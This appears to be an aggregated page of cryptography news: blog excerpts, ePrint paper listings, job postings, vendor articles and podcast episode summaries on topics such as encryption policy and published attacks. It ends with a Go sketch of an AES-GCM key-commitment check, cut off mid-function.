It’s not every day that we see mainstream media get excited about encryption apps! For that reason, the past several days have been fascinating, since we’ve been given not one but several unusual stories about the encryption used in WhatsApp. Or more accurately, if you read the story, a pretty wild allegation that the widely-used … Continue reading WhatsApp Encryption, a Lawsuit, and a Lot of Noise
I learn about cryptographic vulnerabilities all the time, and they generally fill me with some combination of jealousy (“oh, why didn’t I think of that”) or else they impress me with the brilliance of their inventors. But there’s also another class of vulnerabilities: these are the ones that can’t possibly exist in important production software, … Continue reading Kerberoasting
Update 6/10: Based on a short conversation with an engineering lead at X, some of the devices used at X are claimed to be using HSMs. See more further below. Matthew Garrett has a nice post about Twitter (uh, X)’s new end-to-end encryption messaging protocol, which is now called XChat. The TL;DR of Matthew’s post … Continue reading A bit more on Twitter/X’s new encrypted messaging
This is a cryptography blog and I always feel the need to apologize for any post that isn’t “straight cryptography.” I’m actually getting a little tired of apologizing for it (though if you want some hard-core cryptography content, there’s plenty here and here.) Sometimes I have to remind my colleagues that out in the real … Continue reading Dear Apple: add “Disappearing Messages” to iMessage right now
Two weeks ago, the Washington Post reported that the U.K. government had issued a secret order to Apple demanding that the company include a “backdoor” into the company’s end-to-end encrypted iCloud Backup feature. From the article: The British government’s undisclosed order, issued last month, requires blanket capability to view fully encrypted material, not merely assistance … Continue reading Three questions about Apple, encryption, and the U.K.
This is the third and penultimate post in a series about theoretical weaknesses in Fiat-Shamir as applied to proof systems. The first post is here, the second post is here, and you should probably read them. Over the past two posts I’ve given a bit of background on four subjects: (1) interactive proof systems (for … Continue reading How to prove false statements? (Part 3)
I’m supposed to be finishing a wonky series on proof systems (here and here) and I promise I will do that this week. In the midst of this I’ve been a bit distracted by world events. Last week the Washington Post published a bombshell story announcing that the U.K. had filed “technical capability notices” demanding … Continue reading U.K. asks to backdoor iCloud Backup encryption
This is the second part of a two three four-part series, which covers some recent results on “verifiable computation” and possible pitfalls that could occur there. This post won’t make much sense on its own, so I urge you to start with the first part. In the previous post we introduced a handful of concepts, … Continue reading How to prove false statements? (Part 2)
Trigger warning: incredibly wonky theoretical cryptography post (written by a non-theorist)! Also, this will be in two parts. I plan to be back with some more thoughts on practical stuff, like cloud backup, in the near future. If you’ve read my blog over the years, you should understand that I have basically two obsessions. One … Continue reading How to prove false statements? (Part 1)
Recently I came across a fantastic new paper by a group of NYU and Cornell researchers entitled “How to think about end-to-end encryption and AI.” I’m extremely grateful to see this paper, because while I don’t agree with every one of its conclusions, it’s a good first stab at an incredibly important set of questions. … Continue reading Let’s talk about AI and end-to-end encryption
ePrint Report: A Unified Hardware Architecture for Stateful and Stateless Hash-Based Key/Signature Generations
Yechu Zhang, Yuxuan Chu, Yaodong Wei, Yueqin Dai, Qiu Shen, Jing Tian
ePrint Report: On the Use of Atkin and Weber Modular Polynomials in Isogeny Proofs of Knowledge
Thomas den Hollander, Marzio Mula, Daniel Slamanig, Sebastian A. Spindler
ePrint Report: The Verification Theater: When Formal Methods Create False Assurance in Cryptographic Libraries
Nadim Kobeissi
ePrint Report: On the Active Security of the PEARL-SCALLOP Group Action
Tako Boris Fouotsa, Marc Houben, Gioella Lorenzon, Ryan Rueger, Parsa Tasbihgou
ePrint Report: Three-Round (Robust) Threshold ECDSA from Threshold CL Encryption
Bowen Jiang, Guofeng Tang, Haiyang Xue
ePrint Report: Shared and leakage free MAYO
Paco Azevedo-Oliveira, Jordan Beraud, Pierre Varjabedian
ePrint Report: A Visit to KAZ Attack: Finding a Minor Flaw and a Simplified Lattice Construction
Yongbo Hu, Chen Zhang, Guomiao Zhou
ePrint Report: Hardness of hinted ISIS from the space-time hardness of lattice problems
Martin R. Albrecht, Russell W. F. Lai, Eamonn W. Postlethwaite
ePrint Report: Bitcoin PIPEs v2
Michel Abdalla, Brent Carmer, Muhammed El Gebali, Handan Kilinc-Alper, Mikhail Komarov, Yaroslav Rebenko, Lev Soukhanov, Erkan Tairi, Elena Tatuzova, Patrick Towa
ePrint Report: Efficient Quaternion Algorithms for the Deuring Correspondence, and Application to the Evaluation of Modular Polynomials
Antonin Leroux
ePrint Report: Succinct Non-interactive Arguments of Proximity
Liyan Chen, Zhengzhong Jin, Daniel Wichs
ePrint Report: Benchmarking Secure Multiparty Computation Frameworks for Real-World Workloads in Diverse Network Settings
Christopher Harth-Kitzerow, Jonas Schiller, Nina Schwanke, Thomas Prantl, Georg Carle
ePrint Report: Computing in a Safe House: Accountable Universally Composable Asynchronous Secure Distributed Computing
Pierre Civit, Daniel Collins, Vincent Gramoli, Rachid Guerraoui, Jovan Komatovic, Manuel Vidigueira, Pouriya Zarbafian
ePrint Report: Towards Public Tracing: Collaborative Traceable Secret Sharing
Pousali Dey, Rittwik Hajra, Subha Kar, Soumit Pal
ePrint Report: Telling the Story of Chameleon Hash Functions: A 27-Year Review
Houssam Derfoufi, Marina Dehez-Clementi, Jean-Christophe Deneuville
ePrint Report: Nudge: A Private Recommendations Engine
Alexandra Henzinger, Emma Dauterman, Henry Corrigan-Gibbs, Dan Boneh
ePrint Report: Cryptanalytic Extraction of Neural Networks with Various Activation Functions
Xiaokang Qi, Hao Lei, Longxiang Wei, Xiaohan Sun, Meiqin Wang
ePrint Report: A Practical Neighborhood Search Attack on Oracle MLWE
Hongxiao Wang, Muhammed F. Esgin, Ron Steinfeld, Markku-Juhani O. Saarinen, Siu-Ming Yiu
ePrint Report: Differential Pattern Transition: Characterizing the Differential Behavior of AES-like Linear Layers
Jianhua Wang, Tao Huang, Siwei Sun, Hailun Yan, Guang Zeng, Shuang Wu
ePrint Report: Implementable Witness Encryption from Arithmetic Affine Determinant Programs
Lev Soukhanov, Yaroslav Rebenko, Muhammad El Gebali, Mikhail Komarov
ePrint Report: STIP: Efficient and Secure Non-Interactive Transformer Inference via Compact Packing
Zihao Wang, Rongmao Chen, Xinwen Gao, Yi Wang, Lin Liu, Zixin Lan, Zhaoyu Wang, Shaojing Fu, Qiong Wang, Xinyi Huang
ePrint Report: Eidolon: A Practical Post-Quantum Signature Scheme Based on k-Colorability in the Age of Graph Neural Networks
Asmaa Cherkaoui, Ramón Flores, Delaram Kahrobaei, Richard C. Wilson
ePrint Report: A Generalized Attack on RSA and Its Variants
Mengce Zheng, Abderrahmane Nitaj, Maher Boudabra, Michel Seck, Oumar Niang, Djiby Sow
ePrint Report: On The Spectral Theory of Isogeny Graphs and Quantum Sampling of Hard Supersingular Elliptic Curves
David Jao, Maher Mamah
ePrint Report: gcVM: Publicly Auditable MPC via Garbled Circuits with Applications to Private EVM-Compatible Computation
Avishay Yana, Meital Levy, Mike Rosulek, Hila Dahari-Garbian
ePrint Report: New lower bound of the $r$-th order nonlinearity via algebraic immunity
Mikhail Lobanov
ePrint Report: Cryptanalytic Extraction of Recurrent Neural Network Models
Longxiang Wei, Hao Lei, Xiaokang Qi, Xiaohan Sun, Lei Gao, Kai Hu, Wei Wang, Meiqin Wang
ePrint Report: Breaking and Fixing Spoed
Yan Jia, Peng Wang, Gang Liu, Lei Hu, Tingting Guo, Shuping Mao
ePrint Report: Fuzzy Enhanced Private Set Union in Hamming and Minkowski Spaces
Qiang Liu, JaeYoung Bae, Hyung Tae Lee, Joon-Woo Lee
ePrint Report: Secure Montgomery Curves over TMVP-Friendly Primes for High-Performance ECC
Murat Cenk, N. Gamze Orhon Kılıç, Halil Kemal Taşkın, Oğuz Yayla
ePrint Report: Shorter, Tighter, FAESTer: Optimizations and Improved (QROM) Analysis for VOLE-in-the-Head Signatures
Carsten Baum, Ward Beullens, Lennart Braun, Cyprien Delpech de Saint Guilhem, Michael Klooß, Christian Majenz, Shibam Mukherjee, Emmanuela Orsini, Sebastian Ramacher, Christian Rechberger, Lawren ...
ePrint Report: Comment on Makoui
Mohammad Sadegh Ghoralivandzadeh
ePrint Report: IFV: Information Flow Verification at the Pre-silicon Stage Utilizing Static-Formal Methodology
Rasheed Kibria, Farimah Farahmandi, Mark Tehranipoor
ePrint Report: Compact and Low Latency First-Order AES Implementations with Low Randomness
Feng Zhou, Hua Chen, Limin Fan, Junhuai Yang
Announcement: Results of the 2025 Survey on Publication Strategy and Conference Experience
In 2025 we conducted a survey on publication strategy and conference experience. A report of the results is now publicly available at IACR survey results.
Job Posting: Staff Software Engineer, Cryptography R&D
SandboxAQ
Closing date for applications:
Contact: James Howe
More information: https://www.sandboxaq.com/careers-list?ashby_jid=357a6ee1-3fe1-44f3-838a-f81df8b4e044
Job Posting: Postdoctoral Fellows in Fully Homomorphic Encryption
Simula UiB AS, Bergen, Norway
The successful candidates will work on two different projects named PREMAL and SECSHARE, respectively, in Håvard Raddum’s team. We are looking for candidates with a PhD degree in Cryptography, Computer Science, Mathematics, or a closely related field to work on the two projects. The focus of the two projects and the profile for their ideal candidates are described on the linked website where you apply (link below and in the headline).
The positions are both for a three-year period. Simula UiB currently has 11 early-career researchers working on a range of research problems in cryptography and information theory.
Simula UiB offers:
Deadline: 15 March 2026
Read more and apply at: https://www.simula.no/careers/job-openings/postdoctoral-fellows-in-fully-homomorphic-encryption-at-simula-uib
Closing date for applications:
Contact: Håvard Raddum
More information: https://www.simula.no/careers/job-openings/postdoctoral-fellows-in-fully-homomorphic-encryption-at-simula-uib
ePrint Report: Leveraging ASIC AI Chips for Homomorphic Encryption
Jianming Tong, Tianhao Huang, Jingtian Dang, Leo de Castro, Anirudh Itagi, Anupam Golder, Asra Ali, Jeremy Kun, Jevin Jiang, Arvind Arvind, G. Edward Suh, Tushar Krishna
ePrint Report: Dinocchio: Distributed Prover for Ring Arithmetic
Yunhao Wang, Katerina Sotiraki, Fan Zhang
ePrint Report: Setup Protocols for Sender Anonymity
Tian Huang, Jiatai Zhang, Megumi Ando
ePrint Report: In Mid-Stream: Removing the FO-Transform Helps against Leakage but is not Enough
Duyên Pay, Thomas Peters, François-Xavier Standaert
ePrint Report: Hachi: Efficient Lattice-Based Multilinear Polynomial Commitments over Extension Fields
Ngoc Khanh Nguyen, George O'Rourke, Jiapeng Zhang
ePrint Report: Module Learning With Errors and Structured Extrapolated Dihedral Cosets
Weiqiang Wen, Jinwei Zheng
ePrint Report: Oil, Vinegar, and Sparks: Key Recovery from UOV via Single Electromagnetic Fault Injection
Fabio Campos, Daniel Hahn, Daniel Könnecke, Marc Stöttinger
ePrint Report: BOLT: Bootstrapping-Aware Logic Resynthesis and Technology Mapping for Efficient TFHE Circuits
Bhuvnesh Chaturvedi, Ayantika Chatterjee, Anupam Chattopadhyay, Debdeep Mukhopadhyay
ePrint Report: On the Quantum Collision Resistance of HCF Hash Functions
Alisée Lafontaine, André Schrottenloher
ePrint Report: Non-Complete Set Coverings for Higher Order Threshold Implementations
Oriol Farràs, Óscar Fidalgo, Carlos Andres Lara-Nino
ePrint Report: Claiming bounties on small scale Poseidon and Poseidon2 instances using resultant-based algebraic attacks
Antoine Bak, Augustin Bariant, Aurélien Boeuf, Maël Hostettler, Guilhem Jazeron
ePrint Report: Private IP Address Inference in NAT Networks via Off-Path TCP Control-Plane Attack
Suraj Sharma, Adityavir Singh, Mahabir Prasad Jhanwar
ePrint Report: ABBA: Lattice-based Commitments from Commutators
Alberto Centelles, Andrew Mendelsohn
ePrint Report: OptiBridge: A Trustless, Cost-Efficient Bridge Between the Lightning Network and Ethereum
Mohsen Minaei, Duc V. Le, Pedro Moreno-Sanchez
ePrint Report: Feistel Tools: Reprogramming and Query-Recording for QRPs
Yu-Hsuan Huang, Andreas Hülsing, Varun Maram, Silvia Ritsch, Abishanka Saha
ePrint Report: Round-Optimal GUC-Secure Blind Signatures from Minimal Computational and Setup Assumptions
Michele Ciampi, Pierpaolo Della Monica, Ivan Visconti
ePrint Report: Designated-Verifier Dynamic zk-SNARKs with Applications to Dynamic Proofs of Index
Weijie Wang, Charalampos Papamanthou, Shravan Srinivasan, Dimitrios Papadopoulos
ePrint Report: A Unified Treatment of Reachability and Indistinguishability Properties: First-Order Logic with Overwhelming Truth
Gergei Bana, Mitsuhiro Okada
ePrint Report: „One More Time”: Security of One-time Signature Scheme Using Run-length Encoding Under Two-message Attacks
Viktória I. Villányi
ePrint Report: Minimizing Mempool Dependency in PoW Mining on Blockchain: A Paradigm Shift with Compressed Block Representation for Enhanced Scalability, Decentralization and Security.
Gyu Chol Kim
ePrint Report: On the Necessity of Public Contexts in Hybrid KEMs: A Case Study of X-Wing
Taehun Kang, Changmin Lee, Yongha Son
ePrint Report: Cryptanalytic Extraction of Convolutional Neural Networks
Xiaohan Sun, Hao Lei, Longxiang Wei, Xiaokang Qi, Kai Hu, Meiqin Wang, Wei Wang
ePrint Report: From Arithmetic to Shamir: Secure and Efficient Masking Gadgets for Multiplications - Applications to the Post-Quantum Signature Scheme MQOM
Vladimir Sarde, Nicolas Debande, Louis Goubin
ePrint Report: Hensel-lifting black-box algorithms and fast trace computation for elliptic-curve endomorphisms
Lorenz Panny, Damien Robert, Alessandro Sferlazza
ePrint Report: Private Proofs of When and Where
Uma Girish, Grzegorz Gluch, Shafi Goldwasser, Tal Malkin, Leo Orshansky, Henry Yuen
ePrint Report: Randomness-Recovery Trapdoors: a new methodology for enhancing anamorphic encryption
Xuan Thanh Do, Giuseppe Persiano, Duong Hieu Phan, Moti Yung
ePrint Report: Completing the Chain: Verified Implementations of Hash-Based Signatures and Their Security
Manuel Barbosa, François Dupressoir, Rui Fernandes, Andreas Hülsing, Matthias Meijers, Pierre-Yves Strub
If I were to recommend you use a piece of cryptography-relevant software that I created, how would you actually know if it was any good? Trust is, first and foremost, a social problem. If I told you a furry designed a core piece of Internet infrastructure, the reception to this would be mixed, to say […]
In response to the GPG.Fail attacks, a Hacker News user made this claim about the 64-bit “Long Key IDs” used by OpenPGP and GnuPG, while responding to an answer I gave to someone else’s question: OK, to be clear, I am specifically contending that a key fingerprint does not include collisions. My proof is empirical, that no […]
If you think about emails as if they’re anything but the digital equivalent of a postcard–that is to say, postcards provide zero confidentiality–then someone lied to you and I’m sorry you had to find out from a furry blog that sometimes talks about applied cryptography. At the end of 2025, at the 39th Chaos Communications […]
(with apologies to Gil Scott-Heron) If you get all of your important technology news from “content aggregators” like Hacker News, Lobste.rs, and most subreddits, you might be totally unaware of the important but boring infrastructure work happening largely on the Fediverse, indie web, and other less-centralized communities. This is no accident. The rough consensus of […]
I’m pleased to announce the immediate availability of a reference implementation for the Public Key Directory server. This software implements the Key Transparency specification I’ve been working on since last year, and is an important stepping stone towards secure end-to-end encryption for the Fediverse. You can find the software publicly available on GitHub: To get […]
Why replace the elliptic package? Yesterday, the Trail of Bits blog published a post about finding cryptographic bugs in the elliptic library (a Javascript package on NPM) by using Wycheproof. This blog post was accompanied by a new chapter in their Testing Handbook about using Wycheproof as well as two CVEs. It’s pretty cool work, […]
Since I have your attention for the moment, I’d like you to ask yourself a question: What is it that drives you in life? Do you yearn for the feeling of safety? By seeking power, status, wealth, and fame? Is it cravings for pleasure that motivate your actions? Does a sense of obligation to others, […]
It is tempting and forgivable to believe that we’re in control of our social media experiences. After all, we write what we want in our bio, select our avatars, and even come up with our own handles. We decide who we follow, what we post, and which recommendations to consider. It never feels like we’re […]
I have several projects in-flight, and I wanted to write a quick status update for them so that folks can find it easier to follow along. Please bear in mind: This is in addition to, and totally separate from, my full-time employment. Hell Frozen Over A while ago, annoyed by the single point of failure […]
One of the first rules you learn about technical writing is, “Know your audience.” But often, this sort of advice is given without sufficient weight or practical examples. Instead, you’re ushered quickly onto the actual tactile aspects of writing–with the hope that some seed was planted that will sprout later in your education. Science communication […]
In a recent blog post, I laid out the argument that, if you have securely implemented end-to-end encryption in your software, then the jurisdiction where your ciphertext is stored is almost irrelevant. Where jurisdiction does come into play, unfortunately, is where your software is developed and whether or not the local government will employ rubber-hose […]
“Won’t someone think of the poor children?” they say, clutching their pearls as they enact another stupid law that will harm the privacy of every adult on Earth and create Prior Restraint that inhibits the freedom of speech in liberal democracies. If you’re totally ignorant of how things work, the proposal of “verifying you’re an […]
This is a furry blog, where I write about whatever interests me and sign it with my fursona’s name. I sometimes talk about furry fandom topics, but I sometimes also talk about applied cryptography. If you got a mild bit of emotional whiplash from that sentence, the best list of posts to start reading to […]
Every time I lightly touch on this point, I always get someone who insists on arguing with me about it, so I thought it would be worth making a dedicated, singular-focused blog post about this topic without worrying too much about tertiary matters. Here’s the TL;DR: If you actually built your cryptography properly, you shouldn’t […]
I have never seen security and privacy comparison tables (henceforth referred to simply as “checklists” for brevity) used for any other purpose but deception. After pondering this observation, I’m left seriously doubting if these checklists have any valid use case except to manipulate the unsuspecting. Please keep in mind that I’m talking about something very […]
Next month, AMC+ is premiering a new series about furries that tracked down sexual abusers hiding within the furry fandom. It’s called The Furry Detectives: Unmasking a Monster. You can watch the trailer for this below. And I do recommend watching the trailer before reading the rest of this blog post. Done? Okay. Bad Takes […]
I normally don’t like writing “Current Events” pieces (and greatly prefer focusing on what SEO grifters like to call “evergreen content”), but I feel this warrants it. Content warning: Violence, death, mentions of political extremism. What Does “Great” Mean? Imagining living under constant threats of having your house burned down for 2 years, because your […]
It’s becoming increasingly apparent that one of the reasons why tech companies are so enthusiastic about shoving AI into every product and service is that they fundamentally do not understand why people dislike AI. I will elaborate. I was recently made aware of the Jetbrains developer ecosystem survey, which included a lot of questions about […]
The history of this blog might very well be a cautionary tail (sic) about scope creep. The Original Vision For Dhole Moments Originally, I just wanted a place to write about things too long for Twitter (back when I was an avid Twitter poster). I also figured, if nothing else, it would be a good […]
The types of people that proudly call themselves “influencers,” and describe what they create merely as “content,” are so profoundly allergic to authenticity that it bewilders the mind. Don’t believe me? Look no further than the usage of “unalive” in the modern lexicon. The verb “unalive” became a thing because content creators (predominantly on YouTube) […]
In 2026, post-quantum cryptography (PQC) moves from “future planning” to near-term delivery. NIST has approved its first three PQC standards (FIPS 203, 204, and 205), giving the industry a concrete baseline to build on [1].
For Trust Service Providers, banks and governments, eIDAS is no longer just another regulation in the stack. It defines who is trusted, for what, and with which level of legal certainty across the European digital economy.
OpenSSL 3.5 brings the first NIST-standardized post-quantum algorithms into the mainstream OpenSSL toolkit: ML-KEM (key exchange), ML-DSA (lattice signatures), and SLH-DSA (hash-based signatures), believed to withstand large-scale quantum attacks. Large-scale quantum computers will eventually break RSA and ECC. Teams are starting pilots now, before mandates force rushed cutovers.
Selecting the right Trust Service Provider (TSP) vendor is vital for any organisation that issues or relies on Qualified Electronic Signatures (QES), seals, timestamps, or certificates. Under the EU’s eIDAS Regulation, TSPs enable the creation of legally valid and compliant digital transactions across Europe.
With eIDAS 2.0 now in effect, Trust Service Providers across the EU are facing a complex rollout of implementing acts that define the practical application of the new regulation.
Compliance in fintech is anything but straightforward. Between the Payment Card Industry Data Security Standard (PCI DSS) and the National Institute of Standards and Technology (NIST) cybersecurity frameworks, the expectations are high, the details complex, and the pace relentless. For fintechs built on innovation, the challenge isn’t just understanding the rules, it’s keeping up with them while scaling securely and moving fast.
Cryptomathic has completed an independent security assessment of the Mobile Application Security Core (MASC) with NowSecure. The engagement covered iOS and Android builds of the MASC library and a reference application during Q3 2025. Testing aligned to the OWASP Mobile Application Security Verification Standard (MASVS) and used the Mobile Application Security Testing Guide (MASTG) for test execution.
In today’s digital economy, trust is the cornerstone of secure online interactions. Whether signing contracts, authenticating users, or ensuring the integrity of digital communications, Trust Service Providers (TSPs) and Qualified Trust Service Providers (QTSPs) play a crucial role. Both deliver essential services that safeguard transactions and protect identities, but there are significant differences in their recognition, compliance requirements, and legal weight under the EU eIDAS regulation.
Microsoft 365 is the backbone of business productivity, but it also remains one of the most heavily exploited attack surfaces. Business email compromise, malicious macros, and unverified add-ins continue to slip past blunt defenses, leaving organizations stuck between two bad choices: block features and disrupt workflows, or accept the risks and rack up audit findings.
Post-quantum cryptography (PQC) is no longer a theoretical concern. With standards finalized and regulatory frameworks such as DORA, PCI DSS 4.0, and NIS2 setting strict requirements, financial institutions must begin the process of upgrading their cryptographic systems. The transition, however, is far from straightforward.
For several years, CryptoHack has been a free platform for learning modern cryptography through fun and challenging programming puzzles. From toy ciphers to post-quantum cryptography, CryptoHack has a wide-ranging and ever-increasing library of puzzles for both the aspiring and the accomplished cryptographer. On this episode, Nadim and Lucas are joined by Giacomo Pope and Laurence Tennant, the founders of CryptoHack, to discuss how the platform came to be and how it evolved, as well as how to improve cryptographic pedagogy more broadly.
Special Guests: Giacomo Pope and Laurence Tennant.
On April 19th, 2022, Neil Madden disclosed a vulnerability in many popular Java runtimes and development kits. The vulnerability, dubbed “Psychic Signatures”, lies in the ECDSA signature verification code and allows an attacker to bypass signature checks entirely. How are popular cryptographic protocol implementations in Java affected? What's the state of Java cryptography as a whole? Join Neil, Nadim and Lucas as they discuss.
Music composed by Yasunori Mitsuda.
Special Guest: Neil Madden.
Threema is a Swiss encrypted messaging application. It has more than 10 million users and more than 7000 on-premise customers. Prominent users of Threema include the Swiss Government and the Swiss Army, as well as the current Chancellor of Germany, Olaf Scholz. Threema has been widely advertised as a secure alternative to other messengers.
Kenny, Kien and Matteo from the ETH Zurich Applied Cryptography Group present seven attacks against the cryptographic protocols used by Threema, in three distinct threat models. All the attacks are accompanied by proof-of-concept implementations that demonstrate their feasibility in practice.
Links and papers discussed in the show:
Special Guests: Kenny Paterson, Kien Tuong Truong, and Matteo Scarlata.
Benjamin Wesolowski talks about his latest paper in which he mathematically proved that the two fundamental problems underlying isogeny-based cryptography are equivalent.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Benjamin Wesolowski.
A team of cryptanalysts presents the first publicly available cryptanalytic attacks on the GEA-1 and GEA-2 algorithms. Instead of providing full 64-bit security, they show that the initial state of GEA-1 can be recovered from as little as 65 bits of known keystream (with at least 24 bits coming from one frame) in time 2^40 GEA-1 evaluations and using 44.5 GiB of memory. The attack on GEA-1 is based on an exceptional interaction of the deployed LFSRs and the key initialization, which is highly unlikely to occur by chance. This unusual pattern indicates that the weakness was intentionally hidden to limit the security level to 40 bits by design.
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Gaëtan Leurent and Håvard Raddum.
TLS is an Internet standard for securing the communication between servers and clients, for example web servers, FTP servers, and email servers. This is possible because TLS was designed to be application-layer independent, which allows its use in many diverse communication protocols.
ALPACA is an application layer protocol content confusion attack, exploiting TLS servers implementing different protocols but using compatible certificates, such as multi-domain or wildcard certificates. Attackers can redirect traffic from one subdomain to another, resulting in a valid TLS session. This breaks the authentication of TLS and cross-protocol attacks may be possible where the behavior of one protocol service may compromise the other at the application layer.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Marcus Brinkmann and Robert Merget.
Nadim talks with Peter Schwabe and Matthias Kannwischer about the considerations — both in terms of security and performance — when implementing cryptographic primitives for low-level and embedded platforms.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Matthias Kannwischer and Peter Schwabe.
Wi-Fi is a pretty central technology to our daily lives, whether at home or at the office. Given that so much sensitive data is regularly exchanged between Wi-Fi devices, a number of standards have been developed to ensure the privacy and authentication of Wi-Fi communications.
However, a recent paper shows that every single Wi-Fi network protection standard since 1997, from WEP all the way to WPA3, is exposed to a critical vulnerability that allows the exfiltration of sensitive data. How far does this new attack go? How does it work? And why wasn’t it discovered before? We’ll discuss this and more in this episode of Cryptography FM.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Mathy Vanhoef.
Contact discovery is a core feature in popular mobile messaging apps such as WhatsApp, Signal and Telegram that lets users grant access to their address book in order to discover which of their contacts are on that messaging service. While contact discovery is critical for WhatsApp, Signal and Telegram to function properly, privacy concerns arise with the current methods and implementations of this feature, potentially resulting in the exposure of a range of sensitive information about users and their social circle.
Do we really need to rely on sharing every phone number on our phone in order for mobile messengers to be usable? What are the privacy risks, and do better cryptographic alternatives exist for managing that data? Joining us are researchers looking exactly into this problem, who will tell us more about their interesting results.
Links and papers discussed in the show:
All the Numbers are US: Large-scale Abuse of Contact Discovery in Mobile Messengers
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Alexandra Dmitrienko, Christian Weinert, and Christoph Hagen.
Secure multi-party computation is a fascinating field in cryptography, researching how to allow multiple parties to compute secure operations over inputs while keeping those inputs private. This makes multi-party computation a super relevant technology in areas such as code signing, hospital records and more.
But what does it take to bring secure multi-party computation from the blank slate of academia and into the messiness of the real world? Today on Cryptography FM, we’re joined by Dr. Yehuda Lindell and Dr. Nigel Smart, from Unbound Security, to tell us about their research, their experiences with real world secure multiparty computation, and more.
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Nigel Smart and Yehuda Lindell.
On March 1st, 2021, a curious paper appeared on the Cryptology ePrint Archive: senior cryptographer Claus Peter Schnorr submitted research that claims to use lattice mathematics to improve the fast factoring of integers so much that he was able to completely “destroy the RSA cryptosystem” -- certainly a serious claim.
Strangely, while the paper’s ePrint abstract did mention RSA, the paper itself didn’t. Two days later, Schnorr pushed an updated version of the paper, clarifying his method.
Does Schnorr’s proposed method for “destroying RSA” hold water, however? Some cryptographers aren’t convinced. Joining us today is Léo Ducas, a tenured researcher at CWI, Amsterdam, who specialises in lattice-based cryptography, to help us understand where Schnorr was coming from, whether his results stand on their own, and how the influence of lattice mathematics in applied cryptography has grown over the past decade.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Léo Ducas.
Zero-Knowledge proofs have broadened the realm of use cases for applied cryptography over the past decade, from privacy-enhanced cryptocurrencies to applications in voting, finance, protecting medical data and more. In 2018, Dr. Eli Ben-Sasson and his team introduced ZK-STARKs, a new zero-knowledge construction that functions without trusted setup, thereby broadening what zero-knowledge systems are capable of. We’ll talk about ZK-STARKs and more with Eli in this episode of Cryptography FM.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Eli Ben-Sasson.
Every year, the IACR Real World Cryptography symposium brings together researchers, engineers and practitioners in applied cryptography to discuss cryptography that matters, in the real world. To me, this is the big one! The one cryptography conference that matters the most. Who needs proceedings when you’ve got so much excitement in the air, and so many results and projects that actually have a measurable impact on how cryptography affects the real world?
This year’s program is maybe the most exciting yet, with talks on secure channel protocols, multiparty computation, formal methods, post-quantum cryptography, humans, policy and cryptography, hardware, cryptocurrency, cryptography for the cloud, anonymity and more. So many exciting talks! So much new research to discuss! Like every year, Real World Crypto is shaping up to be a veritable who’s who of applied cryptography.
In this special episode of Cryptography FM, I’m joined by fellow researcher Benjamin Lipp in order to just… candidly go through the program of Real World Crypto 2021 and briefly cover each talk’s abstract.
We’re going to have another special episode after Real World Crypto 2021 as a post-conference episode in order to discuss the highlights of the conference. And hopefully we’ll do this every year here on Cryptography FM!
Music composed by Toby Fox and performed by The Consouls.
Special Guest: Benjamin Lipp.
The race for post-quantum cryptographic signature primitives is in its final lap over at NIST, which recently announced DILITHIUM, FALCON and Rainbow as the three signature primitive finalists. But a paper recently published by KU Leuven researcher Ward Beullens claims to find serious weaknesses in the security of Rainbow, one of those three finalists. In fact, the paper claims that the weaknesses are so severe that Rainbow’s security parameters now fall short of the security requirements set out by the NIST post-quantum competition.
But how does Rainbow work, and how do these weaknesses affect it? And why weren’t they spotted until now? We discuss this and more in this week’s episode of Cryptography FM.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Ward Beullens.
Authenticated encryption such as AES-GCM or ChaCha20-Poly1305 is used in a wide variety of applications, including potentially in settings for which it was not originally designed. A question given relatively little attention is whether an authenticated encryption scheme guarantees “key commitment”: the notion that ciphertext should decrypt to a valid plaintext only under the key that was used to generate the ciphertext.
In reality, however, protocols and applications do rely on key commitment. A new paper by engineers at Google, the University of Haifa and Amazon demonstrates three recent applications where missing key commitment is exploitable in practice. They construct AES-GCM ciphertext which can be decrypted to two plaintexts valid under a wide variety of file formats, such as PDF, Windows executables, and DICOM; and the results may shock you.
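To make the notion of key commitment a bit more concrete, here is a minimal Go sketch of one generic mitigation: deriving a key-commitment tag alongside the encryption key, so that a ciphertext only opens under the key that produced it. This is an illustration of the general idea, not the paper's construction; the derivation labels and the ciphertext layout are assumptions chosen for the example.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// deriveSubkeys splits a 32-byte master key into an AES-256 encryption key
// and a key-commitment tag. The labels "enc" and "commit" are illustrative.
func deriveSubkeys(masterKey []byte) (encKey, commitTag []byte) {
	h := hmac.New(sha256.New, masterKey)
	h.Write([]byte("enc"))
	encKey = h.Sum(nil)

	h = hmac.New(sha256.New, masterKey)
	h.Write([]byte("commit"))
	commitTag = h.Sum(nil)
	return
}

// seal encrypts with AES-256-GCM and outputs commitTag || nonce || ciphertext.
func seal(masterKey, plaintext []byte) ([]byte, error) {
	encKey, commitTag := deriveSubkeys(masterKey)
	block, err := aes.NewCipher(encKey)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	out := append([]byte{}, commitTag...)
	out = append(out, nonce...)
	out = append(out, gcm.Seal(nil, nonce, plaintext, nil)...)
	return out, nil
}

// open checks the commitment tag before decrypting, so a ciphertext produced
// under a different key is rejected outright instead of possibly decrypting
// to a second "valid" plaintext.
func open(masterKey, sealed []byte) ([]byte, error) {
	encKey, commitTag := deriveSubkeys(masterKey)
	block, err := aes.NewCipher(encKey)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(sealed) < len(commitTag)+gcm.NonceSize() {
		return nil, errors.New("ciphertext too short")
	}
	if !hmac.Equal(sealed[:len(commitTag)], commitTag) {
		return nil, errors.New("key commitment check failed: wrong key")
	}
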